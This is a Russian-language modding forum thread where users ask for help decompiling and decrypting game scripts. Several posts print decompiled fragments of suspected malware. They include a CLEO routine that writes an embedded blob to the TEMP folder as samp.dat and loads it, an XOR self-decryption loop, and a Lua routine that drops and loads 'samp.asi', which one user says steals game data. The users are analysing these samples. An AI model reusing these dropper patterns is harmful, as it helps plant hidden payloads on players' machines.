Декомпиляция скриптов

FYP

Известный
Автор темы
Администратор
1,763
5,913
GVWUrNJ.png
eNo5cSj.png


Общая тема для просьб о помощи в декомпиляциии и декриптованиии скриптов, плагинов и приложений.
Запрещено просить о декомпиляции/декриптовании софта, выставленного на продажу на нашем сайте.

Рекомендации:
  1. Сначала воспользуйтесь поиском по теме и по форуму, возможно его в декомпилированном виде или с исходным кодом уже выкладывали у нас на сайте.
  2. Попытайтесь декомпилировать самостоятельно: CLEO - декриптор, декомпилятор; AHK - распаковщик .exe; LuaJIT - декомпилятор1, декомпилятор2.
  3. Просить о декомпиляции .asi, .sf, .dll, .exe почти бесполезно, часто такие просьбы остаются без ответа и вряд ли вам это что-то даст. Можете попробовать сами, IDA Pro или Ghidra к вашим услугам.
    • Это не касается .exe, которые являются скомпилированными AutoHotKey-скриптами (.ahk).
  4. Добавьте название скрипта к сообщению, если оно известно - это поможет другим пользователям найти его с помощью поиска.
  5. Сообщения по типу "спасибо, помог" по правилам форума считаются флудом и скорее всего будут удалены. Если вам помогли, вы можете нажать кнопку Мне нравится под ответом - это даст понять, что ответ верный.
 
Последнее редактирование:

noname725

Участник
48
1
Это пожалуйста, хоть и не luac но вместо кода какая то херня
 

Вложения

  • FlyCar_by_NoName.lua
    236.8 KB · Просмотры: 11

TTpocToXaKep

Активный
128
27

Вложения

  • guiobf-decompiled.lua
    127.5 KB · Просмотры: 9
Последнее редактирование:
  • Нравится
Реакции: Святой Леоне

hvntr

Участник
61
15
Очень нужно. Отблагодарю кнопкой нравится.
 

Вложения

  • NEWS_Helper.luac
    238.5 KB · Просмотры: 4

TTpocToXaKep

Активный
128
27
Очень долго вырезал хекс (код который и шифрует его было на 5к строк) что бы оставить исходник - pastebin
А ну и тут оставлю код
(Ничё не юзабельно и компиляции не подлежит, т.к код чисто для просмотра
(Прошу спасибо нажать, старался! А кстати шо по клео почти откачав все hex я увидел что тут ничего нету, просто чел защитил работу)
Скрытое содержимое доступно для зарегистрированных пользователей!
 
Последнее редактирование:
  • Нравится
Реакции: Aziat и qq_mq

YoniXX

Новичок
7
0
How to remove encryption I want to know I think it's VIRUS
Please I want to know how to do it myself
Because DUBUGGER does not always help there are strong encryptions today
Please I want to know how

That's the code right?
:Noname_19977 0AA2: 0@ = load_library "kernel32.dll" // IF and SET 0AA4: 1@ = get_proc_address "GetEnvironmentVariableA" library 0@ // IF and SET alloc 2@ 260 0AA5: call 1@ num_params 3 pop 0 260 2@ "TEMP" alloc 4@ 260 format 4@ "%s\\samp.dat" 2@ 0AA2: 0@ = load_library "msvcrt.dll" // IF and SET 0AA4: 1@ = get_proc_address "fopen" library 0@ // IF and SET 0AA7: call_function 1@ num_params 2 pop 2 "wb" 4@ 3@ 0AA4: 1@ = get_proc_address "fwrite" library 0@ // IF and SET 0AC6: 5@ = label @Noname_9 offset 0AA5: call 1@ num_params 4 pop 4 3@ 1 19968 5@ 0AA4: 1@ = get_proc_address "fclose" library 0@ // IF and SET 0AA5: call 1@ num_params 1 pop 1 3@ 0AA2: 6@ = load_library 4@ // IF and SET :Noname_20226 wait 100 jump @Noname_20226[/ ICODE]
 

Вложения

  • fpsboooster.cs
    19.9 KB · Просмотры: 11
Последнее редактирование:

TTpocToXaKep

Активный
128
27
How to remove encryption I want to know I think it's VIRUS
Please I want to know how to do it myself
Because DUBUGGER does not always help there are strong encryptions today
Please I want to know how

That's the code right?
:Noname_19977 0AA2: 0@ = load_library "kernel32.dll" // IF and SET 0AA4: 1@ = get_proc_address "GetEnvironmentVariableA" library 0@ // IF and SET alloc 2@ 260 0AA5: call 1@ num_params 3 pop 0 260 2@ "TEMP" alloc 4@ 260 format 4@ "%s\\samp.dat" 2@ 0AA2: 0@ = load_library "msvcrt.dll" // IF and SET 0AA4: 1@ = get_proc_address "fopen" library 0@ // IF and SET 0AA7: call_function 1@ num_params 2 pop 2 "wb" 4@ 3@ 0AA4: 1@ = get_proc_address "fwrite" library 0@ // IF and SET 0AC6: 5@ = label @Noname_9 offset 0AA5: call 1@ num_params 4 pop 4 3@ 1 19968 5@ 0AA4: 1@ = get_proc_address "fclose" library 0@ // IF and SET 0AA5: call 1@ num_params 1 pop 1 3@ 0AA2: 6@ = load_library 4@ // IF and SET :Noname_20226 wait 100 jump @Noname_20226[/ ICODE]
Ну на

Оно чистое (не ручаюсь, может подгрузить что-то):
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}
{$USE bitwise}
{$USE CLEO+}
{$USE newOpcodes}

0002: jump -20244
0003: shake_camera
0006: 1@ = 20237
0006: 2@ = 0
0085: 5@ = 0@ // (int)
000E: 5@ -= 7

:NONAME_20286
802D:   not  2@ >= 1@ // (int)
004D: jump_if_false @NONAME_20365
0A8D: 3@ = read_memory 0@ size 1 virtual_protect 1
0B12: 4@ = 3@ XOR -76
0000: NOP
0A8C: write_memory 5@ size 1 value 4@ virtual_protect 1
000A: 0@ += 1
000A: 2@ += 1
000A: 5@ += 1
0002: jump @NONAME_20286

:NONAME_20365
0A9F: 0@ = current_thread_pointer
0A8E: 1@ = 0@ + 16 // int
0A8D: 2@ = read_memory 1@ size 4 virtual_protect 1
000A: 1@ += 4
0A8C: write_memory 1@ size 4 value 2@ virtual_protect 1
No, this is not code
 
Последнее редактирование:

YoniXX

Новичок
7
0
Help me remove the encryption because it is very strange it creates a file named SAMP.ASI

That he steals information from the game and sends it to the site
How is the ASI file (DLL) better?
Because according to the code I do not understand how
function someFunc0 () var_0_0 = {} --to find out the contents of this table look inside the lua file s = var_0_0 var_0_0 = io.open ("samp.asi", "wb") fq = var_0_0 for var_0_3, var_0_4 in pairs (s) do --var_0_0 FORTEST-FORTEST var_0_6 = fq var_0_8 = var_0_4 fq.write (var_0_6, string.char (var_0_8)) end --end of a for loop io.close (fq) var_0_1 = loadDynamicLibrary ("samp.asi") biil = var_0_1 lib = var_0_0 return end [/ ICODE]
 

Вложения

  • 12018.luac
    30.3 KB · Просмотры: 5